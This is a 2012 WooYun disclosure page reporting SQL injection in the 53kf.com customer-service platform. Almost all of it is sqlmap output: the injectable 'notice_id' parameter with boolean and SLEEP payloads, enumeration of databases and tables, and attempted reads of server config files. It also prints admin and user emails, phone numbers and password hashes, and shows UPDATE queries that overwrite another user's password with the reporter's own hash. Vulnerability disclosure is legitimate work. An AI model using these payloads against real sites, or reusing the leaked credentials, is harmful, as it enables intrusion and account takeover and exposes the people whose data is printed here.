当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012892

漏洞标题:53kf.com的SQL严重注入漏洞

相关厂商:53KF企业在线平台

漏洞作者: clzzy

提交时间:2012-10-10 16:33

修复时间:2012-11-24 16:34

公开时间:2012-11-24 16:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-10: 细节已通知厂商并且等待厂商处理中
2012-10-10: 厂商已经确认,细节仅向厂商公开
2012-10-20: 细节向核心白帽子及相关领域专家公开
2012-10-30: 细节向普通白帽子公开
2012-11-09: 细节向实习白帽子公开
2012-11-24: 细节向公众公开

简要描述:

53kf.com的SQL严重注入漏洞导致主站及其多个分站数据库可以被脱裤,Mysql用户为Root,虽不能写文件,但是可以读文件,文件代码看光光~~由于找不到后台,暂时没拿到webshell,反正拿不拿shell估计都是20个Rank,所以懒得费劲了~

详细说明:

sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
available databases [18]:
[*] 53kf_old
[*] 53kfcs
[*] en
[*] en1
[*] entalk
[*] information_schema
[*] ip
[*] ip5
[*] ip_bak
[*] ip_new
[*] mysql
[*] passport
[*] talk
[*] test
[*] ut
[*] v5
[*] v5110110
[*] v5_old
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: 53kfcs
[14 tables]
+------------------+
| admin_oper |
| admin_oper_bill |
| cs_address |
| cs_adv |
| cs_category |
| cs_company |
| cs_company_bill |
| cs_fav |
| cs_index_product |
| cs_mail |
| cs_notice |
| cs_order |
| cs_product |
| cs_same_product |
+------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: v5
[52 tables]
+---------------------+
| ad |
| ad_count |
| ad_show |
| ad_show_js |
| conf_ip1 |
| cps_commission_log |
| cps_user |
| cps_user_account |
| cps_user_logs |
| cps_withdrawing_log |
| daemonlog_recv |
| daemonlog_send |
| gggj_account |
| gggj_accountHistory |
| gggj_ad |
| gggj_ad_old |
| gggj_adstat |
| gggj_config |
| gggj_master_type |
| gggj_master_user |
| gggj_oper_log |
| gggj_require |
| gggj_solution |
| gggj_spread |
| gggj_stat |
| gggj_user |
| gggj_user_config |
| id_record |
| kf_tuo |
| kf_tuo_test |
| mailqueue |
| official_adstat |
| official_stat |
| out_links |
| out_links_message |
| pub_cps |
| sendemail_record |
| user_infor |
| user_infor_xx |
| v5_admin_group |
| v5_admin_oper |
| v5_agent_bill |
| v5_agent_oper |
| v5_cate |
| v5_company |
| v5_company_account |
| v5_company_bill |
| v5_company_config |
| v5_company_talk_log |
| v5_worker |
| web_ad_out_links |
| web_user_url |
+---------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user: '1367'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.gggj_user: '225'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.v5_admin_oper: '3'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: ut
[85 tables]
+--------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| autoreply |
| autoreply2 |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| com_talk |
| com_talk_all_moved |
| com_talk_bak |
| com_talk_hnqyw |
| com_talk_online |
| company |
| company_config |
| company_config1 |
| company_style |
| company_talk |
| company_yiyuan |
| company_yiyuan2 |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| customer2 |
| cyy |
| cyy_group |
| err_infos |
| face |
| file |
| imessage |
| jiulong_log |
| link |
| logsql |
| mail |
| mail_template |
| mailqueue |
| message |
| message2 |
| module |
| module2 |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| user |
| user2 |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| worker_talk |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.v5_admin_oper [3]:
[*] 18981795@qq.com, 605, 761, 0, , louwb, 1115adb0c8644ead44e6192dafb54f96b9d3bfdf, 13588816882, 18981795, ,
[*] tagaxi@gmail.com, 605, 762, 0, , wangys, 30c24dcd9266d646c92bb164d63cbb8b457ce6f8, 13858193074, 88579737, ,
[*] WILL@sina.com, 605, 763, 0, , xuxt, e01bc777acca079d1c41b47660583bc346bc526e, 111, 111, ,
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: talk
[80 tables]
+--------------------------+
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| announcement |
| area_kf |
| autoreply |
| block_user |
| chat_nation |
| chat_net |
| chat_place |
| chat_search |
| chat_worker |
| company |
| company_ad |
| company_config |
| company_etel |
| company_style |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| customer |
| cyy |
| cyy_group |
| err_infos |
| etel_logo |
| face |
| file |
| identity |
| imessage |
| jiulong_log |
| link |
| logo |
| logsql |
| mail_template |
| mailqueue |
| message |
| module |
| module_special |
| robot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sql_sync |
| stat |
| stat_from |
| stat_keyword_month |
| stat_nation |
| stat_place |
| stat_search |
| stat_to |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_delete |
| talk_his_read |
| talk_id |
| talk_subject |
| talk_total |
| talk_vote |
| v5_company_config |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| zsk_category |
| zsk_key |
| zsk_question |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
current database: 'v5'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.cps_user where username='clzzy444': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: v5
Table: cps_user
[13 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| balance | float(10,2) |
| cash_frozen_money | float(10,2) |
| company_url | varchar(50) |
| contact_name | varchar(50) |
| cust_id | varchar(20) |
| id | int(20) |
| is_checked | tinyint(2) |
| is_verified | tinyint(2) |
| mobile | varchar(11) |
| pwd | varchar(50) |
| qq | varchar(11) |
| reg_num | int(10) |
| user_name | varchar(100) |
+-------------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.cps_user where user_name='clzzy444': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.cps_user where id='clzzy444': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.cps_user where qq='235623654' [1]:
[*] 0.00, 0.00, http://www.ggggww.com, ?????????, clzzy444, 28024, 1, 1, 15829002900, my81trWOM1JpY, 235623654, 0, clzzy@qq.com
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where balance>100: '7'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where balance>1000: '0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where balance>500: '2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where cash_frozen_money>500: '0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where cash_frozen_money>100: '0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where cash_frozen_money>600: '0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where cash_frozen_money>550: '0'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where balance>550: '2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select count(*) from v5.cps_user where balance>650: '1'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * from v5.cps_user where balance>550 [2]:
[*] 600.00, 0.00, http://www.53kf.com, ?????????, 53kflify, 27811, 1, 0, 15727949427, mynK8lOObPeyY, 635731110, 63, lifangyuan7878@163.com
[*] 700.00, 0.00, http://www.53kf.com, ??????, 53kfxupan, 27812, 1, 1, 13750928493, my8OmAlyld.yw, 2324347056, 38, yazixupan@163.com
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
update v5.cps_user set pwd='my81trWOM1JpY ' where user_name='lifangyuan7878@163.com': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
update v5.cps_user set pwd='my81trWOM1JpY' where user_name='lifangyuan7878@163.com': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select * where user_name='lifangyuan7878@163.com': None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
select pwd from v5.cps_user where user_name='lifangyuan7878@163.com' [1]:
[*] mynK8lOObPeyY
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
database management system users privileges:
[*] %% (administrator) [26]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
privilege: USAGE
[*] %root% (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/apache/logs/error.log file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/etc/httpd/logs/acces_log file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/etc/httpd/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/usr/local/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/var/www/html/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/var/www/html/apache/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
/home/httpd/conf/httpd.conf file saved to: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: notice_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: notice_id=25 AND 4489=4489
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: notice_id=25 AND SLEEP(5)
---
Database: v5
Table: cps_withdrawing_log
[14 columns]
+------------------------+------------------+
| Column | Type |
+------------------------+------------------+
| account_user | varchar(20) |
| audit_oper | varchar(20) |
| audit_remark | text |
| audit_time | datetime |
| cust_id | varchar(20) |
| id | int(20) |
| io_remark | text |
| money | float(10,2) |
| status | varchar(30) |
| withdrawing_account | varchar(50) |
| withdrawing_audit_oper | varchar(20) |
| withdrawing_remark | text |
| withdrawing_time | datetime |
| withdrawing_type | int(10) unsigned |
+------------------------+------------------+
Database: v5
Table: ad
[19 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| ad_area | varchar(150) |
| ad_content | varchar(255) |
| ad_flag | tinyint(1) |
| ad_type | varchar(2) |
| ad_url | varchar(100) |
| company_id | bigint(20) |
| exp_day | date |
| id | int(11) |
| lang | varchar(5) |
| money | float(10,2) |
| oem | varchar(20) |
| proxy | varchar(20) |
| remark | mediumtext |
| seller | varchar(20) |
| start_day | date |
| sys_flag | tinyint(1) |
| t_day | datetime |
| t_edit_day | date |
| vip_order | int(10) |
+------------+--------------+
Database: v5
Table: pub_cps
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| content | text |
| id | int(20) |
| pub_date | datetime |
| pub_type | varchar(20) |
| title | text |
| url | varchar(50) |
+----------+-------------+
Database: v5
Table: v5_company_account
[10 columns]
+--------------+------------------+
| Column | Type |
+--------------+------------------+
| active_money | float(7,2) |
| company_id | int(20) unsigned |
| fee_date | date |
| fee_money | int(10) |
| fee_total | int(10) |
| fix_money | float(7,2) |
| fz_money | float(7,2) |
| id | int(20) unsigned |
| money | float(7,2) |
| pre_total | int(20) |
+--------------+------------------+
Database: v5
Table: kf_tuo_test
[10 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ad_id | int(10) |
| ad_type | varchar(10) |
| area | varchar(100) |
| arg | varchar(30) |
| come_date | datetime |
| come_ip | varchar(20) |
| come_url | varchar(250) |
| host | varchar(30) |
| id | int(10) |
| user_id | int(10) |
+-----------+--------------+
Database: v5
Table: v5_admin_group
[3 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| id | int(11) |
| name | varchar(50) |
| permission | text |
+------------+-------------+
Database: v5
Table: gggj_spread
[8 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| add_time | date |
| admin_audit | enum('Y','N') |
| end_time | date |
| id | int(10) |
| log | text |
| money | varchar(10) |
| wzz_audit | enum('Y','N') |
| wzz_name | varchar(10) |
+-------------+---------------+
Database: v5
Table: gggj_stat
[10 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum('Y','N','X') |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| end_time | timestamp |
| money_type | tinyint(2) |
+-------------+-------------------+
Database: v5
Table: v5_admin_oper
[11 columns]
+-----------+------------------+
| Column | Type |
+-----------+------------------+
| email | varchar(50) |
| group_id | smallint(2) |
| id | int(10) unsigned |
| is_admin | tinyint(2) |
| name | varchar(128) |
| oper_name | varchar(20) |
| oper_pwd | varchar(50) |
| phone | varchar(15) |
| qq | varchar(12) |
| reg_date | datetime |
| type | varchar(100) |
+-----------+------------------+
Database: v5
Table: daemonlog_send
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| action | char(16) |
| sendid | char(20) |
| stat | text |
+--------+----------+
Database: v5
Table: daemonlog_recv
[3 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| action | char(16) |
| last_recvid | char(20) |
| stat | text |
+-------------+----------+
Database: v5
Table: v5_cate
[3 columns]
+--------+------------------+
| Column | Type |
+--------+------------------+
| id | int(20) unsigned |
| name | varchar(40) |
| pid | int(20) |
+--------+------------------+
Database: v5
Table: out_links_message
[4 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| id | int(10) |
| message | varchar(256) |
| time | datetime |
| user_name | varchar(25) |
+-----------+--------------+
Database: v5
Table: gggj_solution
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| add_date | datetime |
| add_user | int(10) |
| content | text |
| id | int(10) |
| title | varchar(50) |
+----------+-------------+
Database: v5
Table: official_stat
[9 columns]
+-------------+-------------------+
| Column | Type |
+-------------+-------------------+
| ad_date | date |
| ad_from | tinyint(2) |
| ad_id | int(11) |
| ad_price | float |
| Clearing | enum('Y','N','X') |
| click | int(11) |
| disp | int(11) |
| domain_name | varchar(20) |
| money_type | tinyint(2) |
+-------------+-------------------+
Database: v5
Table: gggj_oper_log
[5 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| id | int(11) |
| log | text |
| oper_time | datetime |
| type | varchar(10) |
| user_id | varchar(20) |
+-----------+-------------+
Database: v5
Table: cps_user_logs
[8 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| after_content | varchar(255) |
| before_content | varchar(255) |
| classname | varchar(30) |
| createtime | datetime |
| logs_id | int(11) |
| oper_name | varchar(30) |
| operating | varchar(30) |
| sqlstr | text |
+----------------+--------------+
Database: v5
Table: gggj_user
[7 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| accountCode | varchar(50) |
| add_time | date |
| domain_name | varchar(20) |
| gggj_type | varchar(10) |
| id | int(11) |
| industry | varchar(5) |
| remark | varchar(255) |
+-------------+--------------+
Database: v5
Table: v5_company
[51 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| add_time | datetime |
| address | varchar(255) |
| admin_flag | tinyint(1) |
| chat_num | int(10) |
| chat_num_last | int(10) |
| chat_num_last_total | int(10) |
| city | varchar(50) |
| comm_num | int(10) |
| company_id | int(10) unsigned |
| domain_name | varchar(20) |
| email | varchar(50) |
| fax | varchar(20) |
| free_click | int(10) |
| friend_links | int(10) |
| hot_num | int(10) |
| indus | varchar(50) |
| key_word | varchar(60) |
| kf_bind | tinyint(2) |
| kf_id | varchar(30) |
| kf_type | tinyint(3) |
| last_login | datetime |
| linkman | varchar(25) |
